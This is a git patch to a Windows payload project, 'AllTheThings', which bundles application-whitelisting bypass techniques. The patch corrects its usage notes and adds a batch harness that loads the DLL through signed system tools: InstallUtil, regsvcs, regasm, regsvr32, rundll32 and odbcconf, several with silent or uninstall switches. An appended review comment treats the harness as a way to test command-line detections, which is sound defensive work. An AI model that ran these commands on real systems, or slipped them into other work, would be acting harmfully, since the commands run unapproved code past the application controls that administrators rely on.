From e4e892da8b5278ea56b3113e7c93e7d5e9a2ed12 Mon Sep 17 00:00:00 2001
From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com>
Date: Thu, 30 Nov 2017 06:25:37 -0700
Subject: [PATCH] Updated All The Things
---
 Windows/Payloads/AllTheThings/Program.cs | 20 ++++++++++++++++++--
 1 file changed, 18 insertions(+), 2 deletions(-)
diff --git a/Windows/Payloads/AllTheThings/Program.cs b/Windows/Payloads/AllTheThings/Program.cs
index 261f27dd..71298edf 100755
--- a/Windows/Payloads/AllTheThings/Program.cs
+++ b/Windows/Payloads/AllTheThings/Program.cs
@@ -30,7 +30,7 @@ Includes 5 Known Application Whitelisting/ Application Control Bypass Techinique
 Usage:
 1.
 x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
- x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
+ x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
 2.
 x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
 x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
@@ -45,10 +45,26 @@ Usage:
 rundll32 AllTheThings.dll,EntryPoint
 6.
- odbcconf.exe /a { REGSVR AllTheThings.dll }
+ odbcconf.exe /s /a { REGSVR AllTheThings.dll }
 7.
 regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThings.dll
+
+
+Sample Harness.Bat
+
+[Begin]
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
+regsvr32 /s /u AllTheThings.dll
+regsvr32 /s AllTheThings.dll
+rundll32 AllTheThings.dll,EntryPoint
+odbcconf.exe /a { REGSVR AllTheThings.dll }
+regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThings.dll
+[End]
+
+
 */
 [assembly: ApplicationActivation(ActivationOption.Server)]
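Review bot: The odbcconf line in the new Sample Harness.Bat block reads `odbcconf.exe /a { REGSVR AllTheThings.dll }`, but usage entry 6 is changed in this same hunk to `odbcconf.exe /s /a { REGSVR AllTheThings.dll }`. The two should agree, so that anyone validating process-creation or command-line detections with the harness sees the same command line the usage list documents. The harness also lists only the Framework64 paths, while usage entries 1 and 2 give both x86 and x64, so a one-line remark such as `Harness assumes a 64-bit host; swap Framework64 for Framework on x86` would help. The enclosing block comment opens outside this hunk, so the rest of the usage list is not visible here.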